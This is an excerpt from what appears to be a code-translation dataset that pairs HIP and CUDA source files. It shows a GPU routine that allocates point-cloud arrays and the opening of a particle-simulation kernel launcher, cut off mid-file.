hip_filename
stringlengths
5
84
hip_content
stringlengths
79
9.69M
cuda_filename
stringlengths
4
83
cuda_content
stringlengths
19
9.69M
2c0a22caacec9718680d6a407a742f57f70b98dd.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include <source2.cuh> #include <device_launch_parameters.h> #include <hip/hip_runtime.h> #include <helper_functions.h> #include <c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h> #include "c:/Users/mtf_d/Desktop/src/IPoint.h" #include "c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h" #include "c:/Users/mtf_d/Desktop/src/StackedPoints.h" #include <c:/Users/mtf_d/Desktop/src/UnclassifiedPoints.h> //#include "c:/Users/mtf_d/Desktop/src/PointVector.h" namespace mcc { __global__ void basari(double ***A, int Asize) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; //printf("thread id : %d", threadID); //printf(" %f\n", A[threadID][threadID][threadID]); for (int i = threadID; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize; j++) { //std::cout << A[i][j][0] << " "; printf("X:%f %d", A[i][j][0],threadID); //std::cout << A[i][j][1] << " "; printf("Y:%f %d", A[i][j][1], threadID); //std::cout << A[i][j][3] << " "; printf("Z:%f %d", A[i][j][2], threadID); //std::cout << A[i][j][4] << " "; printf("S:%f %d", A[i][j][3], threadID); printf("\n"); } printf("\n"); } } __global__ void luDeSpline(double***A, double***mtx_v, double***mtx_l, double***cells) { } __global__ void cels(double ***cells) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; printf("tid : %d cell.x : %f cell.y : %f\n", threadID, cells[threadID][0][1], cells[threadID][0][2]); } int source2::bos(double ***A, double ***cellsize, int Asize) { //allocate control_points std::cout << "begin d_C" << std::endl; double*** h_c = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; h_c[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&h_c[i][j], 4 * sizeof(double)); hipMemcpy(h_c[i][j], A[i][j], 4 * sizeof(double), hipMemcpyHostToDevice); } } double ***h_c1 = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; hipMalloc((void***)&(h_c1[i]), twoSize * sizeof(double*)); hipMemcpy(h_c1[i], h_c[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_c; hipMalloc((void****)&d_c, Asize * sizeof(double**)); hipMemcpy(d_c, h_c1, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end d_C" << std::endl; //allocate mtx_v std::cout << "begin mtx_v" << std::endl; double*** mtx_v1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]+3; mtx_v1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&mtx_v1[i][j], 1 * sizeof(double)); } } double ***mtx_v = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; hipMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); hipMemcpy(mtx_v[i], h_c[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_mtx_v; hipMalloc((void****)&d_mtx_v, Asize * sizeof(double**)); hipMemcpy(d_mtx_v, mtx_v, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end mtx_v" << std::endl; //allocate mtx_l std::cout << "begin mtx_l" << std::endl; double*** mtx_l1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; mtx_l1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&mtx_l1[i][j], twoSize * sizeof(double)); } } double ***mtx_l = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; hipMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); hipMemcpy(mtx_l1[i], mtx_l[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_mtx_l; hipMalloc((void****)&d_mtx_l, Asize * sizeof(double**)); hipMemcpy(d_mtx_l, mtx_l, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end mtx_l" << std::endl; //allocate cells std::cout << "begin cells" << std::endl; double*** cells1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; cells1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { hipMalloc((void**)&cells1[i][j], 3 * sizeof(double)); hipMemcpy(cells1[i][j], cellsize[i][j], 3 * sizeof(double), hipMemcpyHostToDevice); } } double ***cells = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; hipMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); hipMemcpy(cells[i], cells1[i], twoSize * sizeof(double*), hipMemcpyHostToDevice); } double*** d_cells; hipMalloc((void****)&d_cells, Asize * sizeof(double**)); hipMemcpy(d_cells, cells, Asize * sizeof(double**), hipMemcpyHostToDevice); std::cout << "end cells" << std::endl; /*double ***d_A; A[0][0][0] = 999; printf("dA 0 0 0 : %f", A[0][0][0]); hipMalloc(&d_A, Asize * sizeof(double)); int x; scanf("%d", &x); printf("allocate started"); for (int i = 0; i < Asize; i++) { int tSize = A[i][0][3]; printf("2"); hipMalloc(&d_A[i], tSize * sizeof(double)); printf("3"); for (int j = 0; j < tSize; j++) { printf("4"); hipMalloc(&d_A[i][j], 4 * sizeof(double)); hipMemcpy(d_A[i][j], A[i][j], 4 * sizeof(double), hipMemcpyHostToDevice); } } printf("allocate completed"); hipMemcpy(&d_A, A, Asize, hipMemcpyHostToDevice); kk << <10, 10 >> > (d_A, 3);*/ /*double **B; hipMalloc(&B, 2 * sizeof(double)); hipMalloc(&B[0], 2 * sizeof(double)); hipMalloc(&B[1], 2 * sizeof(double)); double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 2; D[1] = 3; hipMemcpy(B[0], C, 2 * sizeof(double), hipMemcpyHostToDevice); hipMemcpy(B[1], D, 2 * sizeof(double), hipMemcpyHostToDevice); aa << <2, 2 >> > (B);*/ /*double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 3; D[1] = 4; double **B; hipMalloc(&B[0], 2 * sizeof(double)); hipMalloc(&B[1], 2 * sizeof(double)); hipMemcpy(B[0], C, 2 * sizeof(double), hipMemcpyHostToDevice); hipMemcpy(B[1], D, 2 * sizeof(double), hipMemcpyHostToDevice); hipMalloc(&B, 2 * sizeof(double)); hipMemcpy(B, B, 2 * sizeof(double), hipMemcpyHostToDevice); hipMemcpy(B, B, 2 * sizeof(double), hipMemcpyHostToDevice); aa << <2, 2 >> > ();*/ /*int val = 0; for (int i = 0; i < Asize; i++) { val += A[i][0][3]; } printf("val: %d\n", val); int d = val * 5; printf("val*5: %d\n", d); double *X = (double*)malloc(sizeof(double)*d); double a = 0, b = 0; for (int i = 0, int c = 0; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize;) { if (c % 5 == 0) { X[c] = A[i][j][0]; //printf("X : %f i: %d ", X[c], c); } if (c % 5 == 1) { X[c] = A[i][j][1]; //printf("Y : %f i: %d ", X[c], c); } if (c % 5 == 2) { X[c] = A[i][j][2]; //printf("Z : %f i: %d ", X[c], c); } if (c % 5 == 3) { X[c] = A[i][j][3]; //printf("S : %f i: %d ", X[c], c); } if (c % 5 == 4) { a++; X[c] = b; //printf("V--->> : %f i: %d\n", X[c], c); if (a == A[i][j][3]) { //printf("V--->> : %f i: %d\n", X[c], c); a = 0; b++; } j++; } //printf(" a: %f", a); //printf(" A: %f\n", A[i][j][3]); if (c == d) break; c++; } } printf("%f\n", X[d - 1]); double *d_A; hipMalloc(&d_A, d * sizeof(double)); hipMemcpy(d_A, X, d * sizeof(double), hipMemcpyHostToDevice); kk << <2,3 >> > (d_A, 3); /*double***d_AA; for (int j = 0; j < Asize; j++) { for (int i = A[0][0][0]; i < Asize; i++) { hipMalloc(&A[i][j], Asize * sizeof(float)); } } printf("allocate started");*/ /*for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; //printf("ilk dng size: %d",twoSize); for (int j = 0; j < twoSize; j++) { //int arrSize = A[i][0][0]; //printf("ikinci dongu"); hipMalloc(&d_AA[i][j], 4 * sizeof(double)); } }*/ /*double*** d_AAA = new double**[Asize]; for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; d_AAA[i] = new double*[twoSize]; for (int j = 0; j < twoSize; j++) { d_AAA[i][j] = new double[4]; } } for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; for (int j = 0; j < twoSize; j++) { hipMalloc(&d_AAA[i][j], 4 * sizeof(double)); } } printf("allocate completed"); printf("%d", Asize); for (int a = 0; a < Asize; a++) { int twoArrSize = A[a][0][3]; //printf("ilk dng size: %d", twoArrSize); for (int b = 0; b < twoArrSize; b++) { //printf("ikinci dongu"); hipMemcpy(d_AAA[a][b], A[a][b], 4 * sizeof(double), hipMemcpyHostToDevice); //printf("atama sonras d_A: %f", d_A[0][0][3]); } } printf("copy completed"); kk << <2, 2 >> > (d_AAA, 3);*/ return 1; } }
2c0a22caacec9718680d6a407a742f57f70b98dd.cu
#include <cuda_runtime.h> #include <source2.cuh> #include <device_launch_parameters.h> #include <cuda.h> #include <helper_functions.h> #include <c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h> #include "c:/Users/mtf_d/Desktop/src/IPoint.h" #include "c:/Users/mtf_d/Desktop/src/IUnclassifiedPoints.h" #include "c:/Users/mtf_d/Desktop/src/StackedPoints.h" #include <c:/Users/mtf_d/Desktop/src/UnclassifiedPoints.h> //#include "c:/Users/mtf_d/Desktop/src/PointVector.h" namespace mcc { __global__ void basari(double ***A, int Asize) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; //printf("thread id : %d", threadID); //printf(" %f\n", A[threadID][threadID][threadID]); for (int i = threadID; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize; j++) { //std::cout << A[i][j][0] << " "; printf("X:%f %d", A[i][j][0],threadID); //std::cout << A[i][j][1] << " "; printf("Y:%f %d", A[i][j][1], threadID); //std::cout << A[i][j][3] << " "; printf("Z:%f %d", A[i][j][2], threadID); //std::cout << A[i][j][4] << " "; printf("S:%f %d", A[i][j][3], threadID); printf("\n"); } printf("\n"); } } __global__ void luDeSpline(double***A, double***mtx_v, double***mtx_l, double***cells) { } __global__ void cels(double ***cells) { int threadID = blockDim.x * blockIdx.x + threadIdx.x; printf("tid : %d cell.x : %f cell.y : %f\n", threadID, cells[threadID][0][1], cells[threadID][0][2]); } int source2::bos(double ***A, double ***cellsize, int Asize) { //allocate control_points std::cout << "begin d_C" << std::endl; double*** h_c = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; h_c[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&h_c[i][j], 4 * sizeof(double)); cudaMemcpy(h_c[i][j], A[i][j], 4 * sizeof(double), cudaMemcpyHostToDevice); } } double ***h_c1 = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; cudaMalloc((void***)&(h_c1[i]), twoSize * sizeof(double*)); cudaMemcpy(h_c1[i], h_c[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_c; cudaMalloc((void****)&d_c, Asize * sizeof(double**)); cudaMemcpy(d_c, h_c1, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end d_C" << std::endl; //allocate mtx_v std::cout << "begin mtx_v" << std::endl; double*** mtx_v1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]+3; mtx_v1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&mtx_v1[i][j], 1 * sizeof(double)); } } double ***mtx_v = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; cudaMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); cudaMemcpy(mtx_v[i], h_c[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_mtx_v; cudaMalloc((void****)&d_mtx_v, Asize * sizeof(double**)); cudaMemcpy(d_mtx_v, mtx_v, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end mtx_v" << std::endl; //allocate mtx_l std::cout << "begin mtx_l" << std::endl; double*** mtx_l1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; mtx_l1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&mtx_l1[i][j], twoSize * sizeof(double)); } } double ***mtx_l = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3] + 3; cudaMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); cudaMemcpy(mtx_l1[i], mtx_l[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_mtx_l; cudaMalloc((void****)&d_mtx_l, Asize * sizeof(double**)); cudaMemcpy(d_mtx_l, mtx_l, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end mtx_l" << std::endl; //allocate cells std::cout << "begin cells" << std::endl; double*** cells1 = (double***)malloc(Asize * sizeof(double**)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; cells1[i] = (double**)malloc(twoSize * sizeof(double*)); for (int j = 0; j < twoSize; j++) { cudaMalloc((void**)&cells1[i][j], 3 * sizeof(double)); cudaMemcpy(cells1[i][j], cellsize[i][j], 3 * sizeof(double), cudaMemcpyHostToDevice); } } double ***cells = (double ***)malloc(Asize * sizeof(double **)); for (int i = 0; i < Asize; i++) { int twoSize = cellsize[i][0][0]; cudaMalloc((void***)&(mtx_v[i]), twoSize * sizeof(double*)); cudaMemcpy(cells[i], cells1[i], twoSize * sizeof(double*), cudaMemcpyHostToDevice); } double*** d_cells; cudaMalloc((void****)&d_cells, Asize * sizeof(double**)); cudaMemcpy(d_cells, cells, Asize * sizeof(double**), cudaMemcpyHostToDevice); std::cout << "end cells" << std::endl; /*double ***d_A; A[0][0][0] = 999; printf("dA 0 0 0 : %f", A[0][0][0]); cudaMalloc(&d_A, Asize * sizeof(double)); int x; scanf("%d", &x); printf("allocate started"); for (int i = 0; i < Asize; i++) { int tSize = A[i][0][3]; printf("2"); cudaMalloc(&d_A[i], tSize * sizeof(double)); printf("3"); for (int j = 0; j < tSize; j++) { printf("4"); cudaMalloc(&d_A[i][j], 4 * sizeof(double)); cudaMemcpy(d_A[i][j], A[i][j], 4 * sizeof(double), cudaMemcpyHostToDevice); } } printf("allocate completed"); cudaMemcpy(&d_A, A, Asize, cudaMemcpyHostToDevice); kk << <10, 10 >> > (d_A, 3);*/ /*double **B; cudaMalloc(&B, 2 * sizeof(double)); cudaMalloc(&B[0], 2 * sizeof(double)); cudaMalloc(&B[1], 2 * sizeof(double)); double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 2; D[1] = 3; cudaMemcpy(B[0], C, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMemcpy(B[1], D, 2 * sizeof(double), cudaMemcpyHostToDevice); aa << <2, 2 >> > (B);*/ /*double *C = new double[2]; C[0] = 1; C[1] = 2; double *D = new double[2]; D[0] = 3; D[1] = 4; double **B; cudaMalloc(&B[0], 2 * sizeof(double)); cudaMalloc(&B[1], 2 * sizeof(double)); cudaMemcpy(B[0], C, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMemcpy(B[1], D, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMalloc(&B, 2 * sizeof(double)); cudaMemcpy(B, B, 2 * sizeof(double), cudaMemcpyHostToDevice); cudaMemcpy(B, B, 2 * sizeof(double), cudaMemcpyHostToDevice); aa << <2, 2 >> > ();*/ /*int val = 0; for (int i = 0; i < Asize; i++) { val += A[i][0][3]; } printf("val: %d\n", val); int d = val * 5; printf("val*5: %d\n", d); double *X = (double*)malloc(sizeof(double)*d); double a = 0, b = 0; for (int i = 0, int c = 0; i < Asize; i++) { int tSize = A[i][0][3]; for (int j = 0; j < tSize;) { if (c % 5 == 0) { X[c] = A[i][j][0]; //printf("X : %f i: %d ", X[c], c); } if (c % 5 == 1) { X[c] = A[i][j][1]; //printf("Y : %f i: %d ", X[c], c); } if (c % 5 == 2) { X[c] = A[i][j][2]; //printf("Z : %f i: %d ", X[c], c); } if (c % 5 == 3) { X[c] = A[i][j][3]; //printf("S : %f i: %d ", X[c], c); } if (c % 5 == 4) { a++; X[c] = b; //printf("V--->> : %f i: %d\n", X[c], c); if (a == A[i][j][3]) { //printf("V--->> : %f i: %d\n", X[c], c); a = 0; b++; } j++; } //printf(" a: %f", a); //printf(" A: %f\n", A[i][j][3]); if (c == d) break; c++; } } printf("%f\n", X[d - 1]); double *d_A; cudaMalloc(&d_A, d * sizeof(double)); cudaMemcpy(d_A, X, d * sizeof(double), cudaMemcpyHostToDevice); kk << <2,3 >> > (d_A, 3); /*double***d_AA; for (int j = 0; j < Asize; j++) { for (int i = A[0][0][0]; i < Asize; i++) { cudaMalloc(&A[i][j], Asize * sizeof(float)); } } printf("allocate started");*/ /*for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; //printf("ilk döngü size: %d",twoSize); for (int j = 0; j < twoSize; j++) { //int arrSize = A[i][0][0]; //printf("ikinci dongu"); cudaMalloc(&d_AA[i][j], 4 * sizeof(double)); } }*/ /*double*** d_AAA = new double**[Asize]; for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; d_AAA[i] = new double*[twoSize]; for (int j = 0; j < twoSize; j++) { d_AAA[i][j] = new double[4]; } } for (int i = 0; i < Asize; i++) { int twoSize = A[i][0][3]; for (int j = 0; j < twoSize; j++) { cudaMalloc(&d_AAA[i][j], 4 * sizeof(double)); } } printf("allocate completed"); printf("%d", Asize); for (int a = 0; a < Asize; a++) { int twoArrSize = A[a][0][3]; //printf("ilk döngü size: %d", twoArrSize); for (int b = 0; b < twoArrSize; b++) { //printf("ikinci dongu"); cudaMemcpy(d_AAA[a][b], A[a][b], 4 * sizeof(double), cudaMemcpyHostToDevice); //printf("atama sonrası d_A: %f", d_A[0][0][3]); } } printf("copy completed"); kk << <2, 2 >> > (d_AAA, 3);*/ return 1; } }
f87d8ec53c60c1341ca2d987fa2943b31d98329e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include "DataType.h" #include "DeviceProcess.h" #include "DeviceProcess_Kernel.h" #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <thrust/sequence.h> #include <thrust/random.h> #include <thrust/generate.h> #include <thrust/detail/type_traits.h> #include "IO.h" #include "Configuration.h" #define USECDUASTREAM //Round a / b to nearest higher integer value unsigned int iDivUp(unsigned int a, unsigned int b){ return (a % b != 0) ? (a / b + 1) : (a / b); } class CThreadScaler { private: Integer Dg; Integer Db; public: CThreadScaler(Integer NumThreads) { Db = min ( BLOCK_MAX_DIM, NumThreads); if(Db > 0) { Dg = iDivUp(NumThreads, Db); }else { Dg = 0; } } Integer Grids() { return Dg; } Integer Blocks() { return Db; } }; extern "C" { /*inline void check_cuda_errors(const char *filename, const int line_number) { #ifdef DEBUG hipDeviceSynchronize(); hipError_t error = hipGetLastError(); if(error != hipSuccess) { printf("CUDA error at %s:%i: %s\n", filename, line_number, hipGetErrorString(error)); exit(-1); } #endif }*/ CCTStatusType CalcTurbulenceViscosity(hipStream_t &Stream,Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcTurbulenceViscosity_Kernel), dim3(TS.Grids()), dim3(TS.Blocks()) ,0,Stream, ComputeParticleNum); //std::string kernelName = "CalcTurbulenceViscosity"; //WriteConstant(kernelName,ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check Particle outside compute zone starts CCTStatusType CheckParticleOutsideComputeZone(hipStream_t &Stream,Integer *ParticleNum) { if((*ParticleNum) > 0) { CThreadScaler TS(*ParticleNum); hipLaunchKernelGGL(( CheckParticleOutsideComputeZone_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check particle Outside Compute Zone Ends CCTStatusType CalcExplicitly(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcExplicitly_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType ResetTriangleTopology(hipStream_t &Stream,Integer CellNum, CCell* aCell) { if(CellNum > 0) { CThreadScaler TS(CellNum); hipLaunchKernelGGL(( ResetTriangleTopology_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, CellNum, aCell); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType RegisterTriangleTopology(hipStream_t &Stream,CTriangle* daTriangle, Integer TriangleNum, CCell* daCell, Integer CellNum) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( RegisterTriangleTopology_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, daTriangle, TriangleNum, daCell, CellNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType UpdateTrianglePosition(hipStream_t &Stream,const Integer TriangleNum, CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( UpdateTrianglePosition_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, TriangleNum, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType RotateTrianglePosition(hipStream_t &Stream,const Integer TriangleNum,CTriangle* daTriangles, const Integer analysisStep) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( RotateTrianglePosition_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, TriangleNum, daTriangles, analysisStep); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType ResetWallPosition(hipStream_t &Stream,const Integer TriangleNum,const Integer AnalysisStep,const CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); hipLaunchKernelGGL(( ResetWallPosition_Kernel), dim3(DgTriangle), dim3(DbTriangle),0,Stream, TriangleNum,AnalysisStep, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType CalcSTLDistance(hipStream_t &Stream, Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcSTLDistance_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CaculateCellIDandInitializeHash(hipStream_t &Stream,Integer ParticleNum,Integer CellNum,int* dGridParticleHash, int* dGridParticleIndex, Scalar3* particlePosition) { if(ParticleNum > 0) { CThreadScaler TS(ParticleNum); // calculate grid hash hipLaunchKernelGGL(( calcHashD), dim3(TS.Grids()), dim3(TS.Blocks()) ,0,Stream, ParticleNum,dGridParticleHash,dGridParticleIndex,particlePosition); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType reorderDataAndFindCellStart(hipStream_t& Stream,Integer numParticles,Integer numCells , int* gridParticleHash, int* gridParticleIndex, int* cellStart, int* cellEnd) { if(numParticles > 0) { CThreadScaler TS(numParticles); // set all cells to empty hipMemsetAsync(cellStart, 0xffffffff, numCells*sizeof(int),Stream); hipMemsetAsync(cellEnd, 0xffffffff, numCells*sizeof(int),Stream); int smemSize = sizeof(int)*(TS.Blocks()+1); hipLaunchKernelGGL(( reorderDataAndFindCellStartD), dim3(TS.Grids()), dim3(TS.Blocks()), smemSize,Stream, numParticles,numCells,gridParticleHash, gridParticleIndex,cellStart, cellEnd); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType SortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType StableSortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::stable_sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType CalcDragEffect(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcDragEffect_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressure(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcExplicitPressure_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressureGradient(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcExplicitPressureGradient_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcTemperatureFactor(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcTemperatureFactor_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType InitializeDeviceMemConst(CParameter Parameter,Integer ParticleNum,CTriangle * Triangles,Integer TriangleNum,CTriangleParameters * TriangleParameters, Integer MaxParticleNum, CDistance * STLDistance,Integer * StlID, CCell * Cell,Integer CellNum, Integer * CellStart,Integer * CellEnd,Integer * GridParticleIndex, CGridBox BoundingBox) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(CONSTANT_PARAMETER, &Parameter, sizeof(CParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = 